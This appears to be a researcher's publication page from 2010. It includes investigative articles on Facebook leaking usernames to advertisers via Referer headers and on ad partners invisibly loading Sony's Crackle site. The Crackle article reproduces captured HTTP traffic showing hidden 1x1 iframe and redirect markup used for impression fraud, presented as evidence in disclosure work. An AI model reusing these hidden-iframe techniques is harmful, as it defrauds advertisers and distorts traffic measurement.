In 2010, the Department of Transportation issued a Notice of Proposed Rulemaking (NPRM) as to enhancing airline passenger protections. I filed a comment as to one of the subjects under discussion: whether and how airlines should be required to disclose fees through GDS’s, and what might happen if the DOT imposed such a duty without airlines contracting in advance to obtain such service from GDS’s.
Least-Cost Avoiders in Online Fraud and Abuse
Edelman, Benjamin. “Least-Cost Avoiders in Online Fraud and Abuse.” IEEE Security & Privacy 8, no. 4 (July-August 2010): 78-81.
Web users face considerable fraud, malfeasance, and economic harm that system operators could prevent or mitigate. Although the legal system can respond, regulations have mixed results. I examine the applicable legal rules that constrain online fraud and the economic underpinnings to identify whether those rules assign responsibility to the parties best positioned to take action.
The Pathologies of Online Display Advertising Marketplaces
Edelman, Benjamin. “The Pathologies of Online Display Advertising Marketplaces.” Art. 2. SIGecom Exchanges (June 2010).
Display advertising marketplaces place “banner” ads on all manner of popular sites. While these services are widely used, they suffer significant challenges, including weak user response and low accountability for both advertisers and web site publishers. I survey a few major challenges, flagging possible areas for future research.
Facebook Leaks Usernames, User IDs, and Personal Details to Advertisers updated May 26, 2010
Browse Facebook, and you wouldn’t expect Facebook’s advertisers to learn who you are. After all, Facebook’s privacy policy and blog posts promise not to share user data with advertisers except when users grant specific permission. For example, on April 6, 2010 Facebook’s Barry Schnitt promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.”
My findings are exactly the contrary: Merely clicking an advertiser’s ad reveals to the advertiser the user’s Facebook username or user ID. With default privacy settings, the advertiser can then see almost all of a user’s activity on Facebook, including name, photos, friends, and more.
In this article, I show examples of Facebook’s data leaks. I compare these leaks to Facebook’s privacy promises, and I point out that Facebook has been on notice of this problem for at least eight months. I conclude with specific suggestions for Facebook to fix this problem and prevent its reoccurrence.
Facebook’s data leak is straightforward: Consider a user who clicks a Facebook advertisement while viewing her own Facebook profile, or while viewing a page linked from her profile (e.g. a friend’s profile or a photo). Upon such a click, Facebook provides the advertiser with the user’s Facebook username or user ID.
Facebook leaks usernames and user IDs to advertisers because Facebook embeds usernames and user IDs in URLs which are passed to advertisers through the HTTP Referer header. For example, my Facebook profile URL is http://www.facebook.com/bedelman. Notice my username (yellow).
Of course, it would be incorrect to assume that a person looking at a given profile is in fact the owner of that profile. A request for a given profile might reflect that user looking at her own profile, but it might instead be some other user looking at the user’s profile. However, when a user views her own profile page, Facebook automatically embeds a “profile” tag (green) in the URL:
http://www.facebook.com/bedelman?ref=profile
Furthermore, when a user clicks from her profile page to another page, the resulting URL still bears the user’s own user ID or username, along with the details of the later-requested page. For example, when I view a friend’s profile, the resulting URL is as shown below. Notice the continued reference to my username (yellow) and the fact that this is indeed my profile (green), along with an appendage naming the user whose page I am now viewing (blue).
http://www.facebook.com/bedelman?ref=profile#!/pacoles
Each of these URLs is passed to advertisers whenever a user clicks an ad on Facebook. For example, when I clicked a Livingsocial ad on my own profile page, Facebook redirected me to the advertiser, yielding the following traffic to the advertiser’s server. Notice the transmission in the Referer header (red) of my username (yellow) and the fact that I was viewing my own profile page (green).
GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_ 1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile
…
Host: livingsocial.com
…
The same transmission occurs when a user clicks from her profile page to a friend’s page. For example, I clicked through to a friend’s profile, http://www.facebook.com/bedelman?ref=profile#!/pacoles, where I clicked another Livingsocial ad. Again, Facebook’s redirect caused my browser to transmit in its Referer header (red) my username (yellow), the fact that that username reflects my personal profile (green). Interestingly, my friend’s username was omitted from the transmission because it occurred after a pound sign, causing it to be automatically removed from Referer transmission.
GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_ 1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile
…
Host: livingsocial.com
…
In further testing, I confirmed that the same transmission occurs when a user clicks from her profile page to a photo page, or to any of various other pages linked form a user’s profile.
With a Facebook member’s username or user ID, current Facebook defaults allow an advertiser (and anyone else) to obtain a user’s name, gender, other profile data, picture, friends, networks, wall posts, photos, and likes. Furthermore, the advertiser already knows the user’s basic demographics, since the advertiser knows the user fits the profile the advertiser had requested from Facebook. For example, in grey highlighting above, the advertiser learned from Facebook my age, gender, and geographic location.
Facebook’s Contrary Statements about User Privacy vis-a-vis Advertisers
Facebook has made specific promises as to what information it will share with advertisers. For one, Facebook’s privacy policy promises “we do not share your information with advertisers without your consent” (section 5). Then, in section 7, Facebook lists eleven specific circumstances in which it may share information with others — but none of these circumstances applies to the transmission detailed above.
Facebook’s recent blog postings also deny that Facebook shares users’ identities with advertisers. In an April 6, 2010 post, Facebook promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.” Facebook’s prior postings were similar. July 1, 2009: “Facebook does not share personal information with advertisers except under the direction and control of a user. … You can feel confident that Facebook will not share your personal information with advertisers unless and until you want to share that information.” December 9, 2009: “Facebook never shares personal information with advertisers except under your direction and control.” As to all these claims, I disagree. Sharing a username or user ID upon a single click, without any disclosure or indication that such information will be shared, is not at a user’s direction and control.
Facebook Has Been on Notice of This Problem for Eight Months
AT&T Labs researcher Balachander Krishnamurthy and Worcester Polytechnic Instituteprofessor Craig Wills previously identified the general problem of social networks leaking user information to advertisers, including leakage through the Referer headers detailed above. In August 2009, their On the Leakage of Personally Identifiable Information Via Online Social Networks was posted to the web and presented at the Workshop on Online Social Networks (WOSN).
Through Krishnamurthy and Wills’ research, Facebook eight months ago received actual notice of the data leakage at issue. A September 2009 MediaPost article confirms Facebook’s knowledge through it spokesperson’s response. However, Facebook spokesperson Simon Axten severely understated the severity of the data leak: Axten commented “The average Facebook user views a number of different profile pages over the course of a session …. It’s thus difficult for a tracking website to know whether the identifier belongs to the person being tracked, or whether it instead belongs to a friend or someone else whose profile that person is viewing.” I emphatically disagree. As shown above, when a user views her own profile, or a page linked from her own profile, the “?ref=profile” tag is added to the URL — exactly confirming the identity of the profile owner.
Since receiving actual notice of these data leaks, Facebook has implemented scores of new features for advertising, monetization, information-sharing, and reorganization. Inexplicably, Facebook has failed to address leakage of user information to advertisers. That’s ill-advised and short-sighted: Users don’t expect ad clicks to reveal their names and details, and Facebook’s privacy policy and blog posts promise to honor that expectation. So Facebook needs to adjust its actual practices to meet its promises.
Preventing advertisers from receiving usernames and user IDs is strikingly straightforward: A modified redirect can mask referring URLs. Currently, Facebook uses a simple HTTP 301 redirect, which preserves referring URLs — exactly creating the problem detailed above. But a FORM POST redirect, META REFRESH redirect, or JavaScript redirect could conceal referring URLs — preventing advertisers from receiving username or user ID information.
Instead, Facebook has partially implemented the pound sign method described above — putting some, but not all, sensitive information after a pound sign, with the result that sometimes this information is not transmitted as a Referer. If fully implemented across the Facebook site, this approach might prevent the data leakage I uncovered. However, in my testing, numerous within-Facebook links bypass the pound sign masking. In any event, an improved redirect would be much simpler to implement — requiring only a single adjustment to the ad click-redirect script, rather than requiring changes to URL formats across the Facebook site.
Finally, Facebook should inform users of what has occurred. Facebook should apologize to users, explain why it didn’t live up to its explicit privacy commitments, and establish procedures — at least robust testing, if not full external review — to assure that users’ privacy is correctly protected in the future.
On May 20, 2010, the Wall Street Journal reported the problem detailed above. On or about that same day, Facebook removed the ref=profile tags that were the crux of the data leak.
I yesterday spoke with Arturo Bejar, a Facebook engineer who investigated this problem. Arturo told me that after Krishnamurthy and Wills’ article, he reviewed relevant Facebook systems in search of leakage of user information. At that time, he found none, in that Facebook revealed the URLs users were browsing when they clicked ads, but did not indicate whether the user clicking a given ad was in fact the owner of the profile showing that ad. However, in a subsequent Facebook redesign, beginning in February 2010, Facebook user home pages received a new “profile” button which carried the ref=profile URL tags I analyze above. Because this tag was added without a further privacy review, Arturo tells me that he and others at Facebook did not consider the interaction between this tag and the problem I describe above. Arturo says that’s why this problem occurred despite the prior Krishnamurthy and Wills article.
Arturo also pointed out that the problem I describe did not affect advertisers whose landing pages were pages on Facebook (rather than advertisers’ own external sites).
Meanwhile, Facebook’s May 24 “Protecting Privacy with Referrers” presents Facebook’s view of the problem in greater detail. Facebook’s posting offers a fine analysis of the various methods of redirects and Facebook’s choice among them. It’s worth a read.
After discussing the problem with Arturo and reading Facebook’s new post, I reached a more favorable impression of Facebook’s response. But my view is tempered by Facebook’s ill-advised attempts to downplay the breach.
- Rather than affirmatively describing the specific design flaw, Facebook’s post describes what “could” “potentially” occur. Facebook’s post never gives a clear affirmative statement of the problem.
- Facebook says advertisers would need to “infer” a user’s username/ID. But usernames and IDs are sent directly, in clear and unambiguous URLs, hardly requiring complex analysis
- Facebook claims that the breach affected only “one case … if a user takes a specific route on the site” (WSJ quote). Facebook also calls the problem “a rarely occurring case” (posting). I dispute these characterizations. It is hardly “rare” for a user to view her own profile. To view her own profile and click an ad? There’s no reason to think that’s any less frequent than clicking an ad elsewhere. To view her own profile, click through to another page, and then click an ad? That’s perfectly standard. Furthermore, although Facebook told the Journal there is “one case” in which data is leaked improperly, in fact I’ve found many such cases including clicking from profile to ad, from profile to friend’s page to ad, and from profile to photo page to ad, to name three.
- Through transmission in HTTP Referer headers, usernames and IDs appears reach advertisers’ web servers in a manner such that default server log files would store this data indefinitely, and default analytics would tabulate it accordingly. Facebook says it has “no reason to believe that any advertisers were exploiting” the data breach I reported, but the fact is, this data ends up in a place where advertisers could (and, as to historic data, still can) access it easily, using standard tools, and at their convenience.
- Although Facebook’s post says the problem is “potential,” I found that a user’s username/ID is sent with each and every click in the affected circumstances.
So the problem was substantial, real, and immediate. Facebook errs in suggesting the contrary.
Optimal Auction Design and Equilibrium Selection in Sponsored Search Auctions
Edelman, Benjamin, and Michael Schwarz. “Optimal Auction Design and Equilibrium Selection in Sponsored Search Auctions.” American Economic Review 100, no. 2 (May 2010): 597-602. (First circulated in 2006 as Optimal Auction Design in a Multi-unit Environment: The Case of Sponsored Search Auctions. Reprinted in The Economics of E-Commerce, Michael Baye and John Morgan, editors, 2016.)
We characterize the optimal (revenue maximizing) auction for sponsored search advertising. We show that a search engine’s optimal reserve price is independent of the number of bidders and independent of the rate at which click-through rate declines over positions. We separate the effects of reserve price increases into direct effects (on the low bidder) and indirect effects (on others), and we show that most of the incremental revenue from setting reserve price optimally comes from indirect effects.
Sony’s Crackle: Invisible Traffic Galore
Advertisers buying display ads from Sony’s Crackle.com rightly and reasonably expect that users can see the ads. After all, a visible ad is a basic and crucial condition for effective display advertising: If a user can’t see ad, then the impression is wasted, as is the associated spending. Nonetheless, in a surprising series of incidents, numerous Crackle partners are loading the Crackle site invisibly — thereby overcharging advertisers for worthless invisible impressions.
Below, I present three recent examples of Crackle partners loading the Crackle site invisibly, largely via 1×1 IFRAMEs. I then tabulate observations preserved by my automation, demonstrating that Crackle’s tainted traffic has continued for more than a year. I conclude by flagging implications for traffic measurement and ad pricing, and by suggesting what Crackle should do to clean up this mess.
Example 1: Yahoo Right Media, Adjuggler Invisible (1×1) IFRAME Loads Crackle Invisibly
In testing of April 24, 2010, my Automatic Spyware Advertising Tester browsed a series of ad URLs I had previously observed to be loaded by various spyware (installed through security exploits without user consent). One such URL embedded Bcserving tags for a 160×600 IFRAME, which passed traffic through Yahoo Right Media (yellow) to Adjuggler (green). Crucially, Adjuggler responded with an invisible 1×1 IFRAME (red) loading a URL on the Crackle site (blue). Meanwhile, another 1×1 IFRAME loaded competing video site Buddytv (grey).
GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=1292398882782181&nc=26008239 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgAcAAoAAAAAAP8AAAAHGBe4GAAAAAA
ANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIAAgAAAAAAXI.C9Shczz
9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJXq7VaJccC
LvQxO2LYSYeejv1pj-PofdqHVgeAAAAAA==,,…,4256ee3e-5018-11df-ace3-001e6837e93f
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_185B9A7222F0F2E13794DA5C=a; ajcmp=2023xkW0101Em0039kn
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sun, 25 Apr 2010 03:11:36 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC= “http://search.dailygamingupdates.com/ioq1wEIC6YxRSnWiIC9BHpdX0b1i.html”><“+”/IFRAME><“+”br><“+”/br>n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC=”http://crackle.com/c/A_River_Runs_Through_It/?cmpid=762“><“+”/IFRAME><“+”br><“+”/br>n”);
document.write(“n”);
document.write(“<“+”iframe src=”http://www.buddytv.com/home2/american-idol-home2.aspx” width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″><“+”/iframe>”);
The net effect was to load the Crackle site completely invisibly. The page-load also embedded tracking tags for comScore/ScorecardResearch (yellow). Unless comScore takes special steps to recognize and discount these invisible loads of the Crackle site, the presence of these tags would cause comScore services to overstate Crackle’s popularity.
<script type=”text/javascript”>
document.write(unescape(“%3Cscript src='” + (document.location.protocol == “https:” ? “https://sb” : “http://b”) + “.scorecardresearch.com/beacon.js’ %3E%3C/script%3E”));
</script>
<script type=”text/javascript”>
COMSCORE.beacon({
c1: 2,
c2: 6035898,
c3: “”,
c4: “Crackle.com”,
c5: “030224”,
c6: “”,
c15: “”
});
</script>
Example 2: Yahoo Right Media, Adjuggler, Media Javelin Overflowing IFRAME (1280×800 inside 160×600) Loads Crackle Invisibly
In testing of April 14, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to an ad on Adjuggler (green) with a HTML comment referencing Media Javelin (pink). The placement was purportedly a 160×600 (grey), yet the response included a further 160×600 ad (completely filling the available space) (grey) followed by three 1280×800 IFRAMEs (red). The third of these IFRAMEs passed traffic to an Adspeed URL (orange) which passed traffic to Crackle (blue).
GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=9001545836619459&nc=92606617 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAEAh e4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIA AgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_…=a; ajcmp=…
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Wed, 14 Apr 2010 05:43:20 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript
Set-Cookie: ajcmp=…;Max-Age=315360000;expires=Sat, 11 Apr 2020 05:43:20 GMT;Path=/
document.write(“<“+”!– BEGIN STANDARD TAG – 160 x 600 – Mediajavelin.com: Run-of-site – DO NOT MODIFY –>n”);
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC=”http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=1024×800§ion=820955“><“+”/IFRAME>n”);
document.write(“<“+”!– END TAG –>n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_home_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82609&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82609&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_idol_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82610&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82610&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Crackle_blood_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82611&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“”);
GET /ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAE Ahe4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAA AAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: g.adspeed.net
Connection: Keep-Alive
HTTP/1.1 200 OK
P3P: policyref=”http://g.adspeed.net/w3c/p3p.xml”, CP=”NOI CUR ADM OUR NOR STA NID”
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Content-type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Wed, 14 Apr 2010 05:43:19 GMT
Server: AdSpeed/s10
<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style=”background-color:transparent”><SCRIPT language=”JavaScript”>
<!–
window.location=”http://crackle.com/c/Blood/?cmpid=763“;
//–>
</SCRIPT><div style=”position:absolute;left:0px;top:0px;visibility:hidden;”><img src=”http://g.adspeed.net/ad.php?do=imp&zid=0&aid=82611&auth=0DB7FD0BC9&wd=1280&ht=800&cb=1271223799″ alt=”i” width=”1″ height=”1″ /></div></body></html>
The net effect was to load the Crackle site completely invisibly. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.
Example 3: Yahoo Right Media, Extreme-sportsonline, Hotbizguide Double Invisible (1×1) IFRAMEs Load Crackle Invisibly
In testing of April 13, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to Extreme-sportsonline (green) which included a 1×1 IFRAME (grey) passing traffic to Hotbizguide (pink). Hotbizguide returned two separate 1×1 IFRAMEs (red) loading Crackle (blue)
GET /BhkG9KftZrBezVPLOKuGW5pr4LRA.html HTTP/1.1 …
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJGEgAAAAAAARoEwAAAAAAAgA0AAIAAAAAAP8AAA ADChe4GAAAAAAASncaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYA AAAAAAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHyzysEFgNCMHLNiu.ziQAnw9Ws9ezWVJH53CoAAAAAA==,,…
Host: search.extreme-sportsonline.com …
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 13:37:58 GMT
…
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html ; }
function trigger() { step++; if(step==max_steps){ load_content(); } }
</script>
<div id=”inifrcode”></div>
<iframe src=”http://search.hotbizguide.com/66682d5b6048f47cf70e56deb9989bb1.php” marginwidth=”0″ marginheight=”0″ hspace=”0″ vspace=”0″ frameborder=”0″ scrolling=”no” width=”1″ height=”1″ onload=”trigger();”></iframe><!–inifrcode–>
<div id=”stuff”></div>
<div id=”stuff1″></div>
<div id=”innercode”></div>
</body>
</html>
GET /MTNkyUL9SGHUGOPKuJJ7uj3AOWuN.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://search.mobilegamesearch.com/NgVbJ4eWaW7bMt57RcZVGMggRW9t.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: search.hotbizguide.com
Connection: Keep-Alive
Cookie: PHPSESSID=a8qbtgec2k79fd8c6onqp5k3q6
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 21:45:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trkid=…; expires=Fri, 16-Apr-2010 21:45:49 GMT
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html >iframe src=”http://crackle.com/c/A_River_Runs_Through_It/?cmpid=728” width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″></iframe>
<iframe src=”http://crackle.com/c/The_Beast/?cmpid=692” width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″></iframe>
<!–customcode–>
The net effect was to load the Crackle site completely invisibly, twice. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.
To confirm the scope of Crackle’s invisible and forced-visit traffic and to evaluate trends over time, I searched logs preserved by my Automatic Spyware Advertising Tester. My tester records the URLs of pages loaded by the spyware-infected virtual computers, but my tester never intentionally visited the Crackle site, nor did my tester ever prompt or provoke traffic to Crackle in any way. So if my tester observes traffic to Crackle, that traffic must have occurred unrequested — invisibly or, at best, through a spyware popup or popunder.
The following table summarizes my tester’s observations of traffic to Crackle:
Month | Number of observations of traffic to Crackle.com |
Q1 2009 |
15
|
Q2 2009 |
57
|
Q3 2009 |
95
|
Q4 2009 |
31
|
Q1 2010 |
51
|
April 2010 (month to date) |
74
|
Although my testing methods have changed over time (e.g. to test new spyware), my testing intensity has remained constant. I have no specific reason to expect that adjustments to my methods would be more or less effective at uncovering Crackle incidents. I therefore tend to attribute month-to-month changes to changes in the intensity with which Crackle’s partners purchase invisible traffic and other tainted traffic on Crackle’s behalf. In my experience, most traffic-buyers run on-and-off campaigns — buying traffic for a time, then taking a break. If Crackle’s traffic buying followed a similar approach, spikes would be expected.
In any event, invisible and forced-visit traffic to Crackle cannot be written off as a short-term anomaly. Quite the contrary, my tester’s observations confirm that these problems have persisted for many months.
Advertisers buying placements on Crackle reasonably expect high-quality traffic. For example, the first clause of Crackle’s “About” page boasts that Crackle is owned by Sony, and Sony’s size and wealth provide a level of accountability that smaller video sites cannot offer. Nonetheless, my observations confirm that some placements on Crackle are entirely worthless.
Crackle may blame its tainted and invisible traffic on traffic brokers, affiliates, and other external forces. But traffic-buying inevitably invites exactly these shenanigans. If Crackle intends to buy traffic, it should better vet its partners — including confirming partners’ bona fides, overseeing partners’ specific methods, and developing procedures to hold partners accountable for any shortfalls. I’ve seen no sign of any such efforts. If Crackle can’t buy traffic with the requisite skill, perhaps Crackle would do better by ceasing to buy traffic at all.
Three years ago, I posted How Spyware-Driven Forced Visits Inflate Web Site Traffic Counts, pointing out that cheap spyware and popup traffic can increase measurements of web site popularity. Users at least see those spyware popups, giving some nugget of rationale for resulting traffic figures. But users cannot even see the Crackle site when it is loaded invisibly as detailed above. Nonetheless, invisible site-loads are still likely to inflate measurements of Crackle’s traffic. For example, during the first few days of April 2010, my tester observed rampant fake traffic to Crackle — and Alexa simultaneously reported a major spike in Crackle’s traffic. (See image at right.) Furthermore, with comScore tags embedded in each Crackle impression, comScore systems receive a report each time Crackle’s site is loaded. Indeed, such reports come from a large number of distinct IP addresses — seemingly confirming that the traffic is legitimate. Can comScore successfully recognize and discount invisible loads of the Crackle site? If not, comScore will join Alexa in overstating Crackle’s popularity.
My bottom line? Buying traffic is a dirty business — so many sellers who provide worthless traffic, and so many buyers who use too little care in selecting and assessing the traffic they buy. As it stands, advertisers and networks doing business with Crackle risk paying for ads users cannot see. Plenty of small-time video sites play these games, but it’s disappointing to see a Sony site stoop to that level.
Measuring Typosquatting Perpetrators and Funders
Moore, Tyler, and Benjamin Edelman. Measuring Typosquatting Perpetrators and Funders. Light Blue Touchpaper. February 17, 2010.
Introduction to Moore, Tyler, and Benjamin Edelman. “Measuring the Perpetrators and Funders of Typosquatting.” Lecture Notes in Computer Science. Springer-Verlag. Financial Cryptography and Data Security: Proceedings of the International Conference 6052 (2010).
Google Inc. (teaching materials) with Thomas Eisenmann
Edelman, Benjamin, and Thomas R. Eisenmann. “Google Inc.” Harvard Business School Case 910-036, January 2010. (Revised April 2011.) (Winner of ECCH 2011 Award for Outstanding Contribution to the Case Method – Strategy and General Management.) (educator access at HBP.)
Describes Google’s history, business model, governance structure, corporate culture, and processes for managing innovation. Reviews Google’s recent strategic initiatives and the threats they pose to Yahoo, Microsoft, and others. Asks what Google should do next. One option is to stay focused on the company’s core competence, i.e., developing superior search solutions and monetizing them through targeted advertising. Another option is to branch into new arenas, for example, build Google into a portal like Yahoo or MSN; extend Google’s role in e-commerce beyond search, to encompass a more active role as an intermediary (like eBay) facilitating transactions; or challenge Microsoft’s position on the PC desktop by developing software to compete with Office and Windows.
Supplements:
Google Inc. (Abridged) – Case (HBP 910032)
Teaching Materials:
Google inc. and Google Inc. (Abridged) – Teaching Note (HBP 910050)
Google Toolbar Tracks Browsing Even After Users Choose "Disable"
Disclosure: I serve as co-counsel in unrelated litigation against Google, Vulcan Golf et al. v. Google et al. I also serve as a consultant to various companies that compete with Google. But I write on my own — not at the suggestion or request of any client, without approval or payment from any client.
Run the Google Toolbar, and it’s strikingly easy to activate “Enhanced Features” — transmitting to Google the full URL of every page-view, including searches at competing search engines. Some critics find this a significant privacy intrusion (1, 2, 3). But in my testing, even Google’s bundled toolbar installations provides some modicum of notice before installing. And users who want to disable such transmissions can always turn them off – or so I thought until I recently retested.
In this article, I provide evidence calling into question the ability of users to disable Google Toolbar transmissions. I begin by reviewing the contents of Google’s "Enhanced Features" transmissions. I then offer screenshot and video proof showing that even when users specifically instruct that the Google Toolbar be “disable[d]”, and even when the Google Toolbar seems to be disabled (e.g., because it disappears from view), Google Toolbar continues tracking users’ browsing. I then revisit how Google Toolbar’s Enhanced Features get turned on in the first place – noting the striking ease of activating Enhanced Features, and the remarkable absence of a button or option to disable Enhanced Features once they are turned on. I criticize the fact that Google’s disclosures have worsened over time, and I conclude by identifying changes necessary to fulfill users’ expectations and protect users’ privacy.
"Enhanced Features" Transmissions Track Page-Views and Search Terms
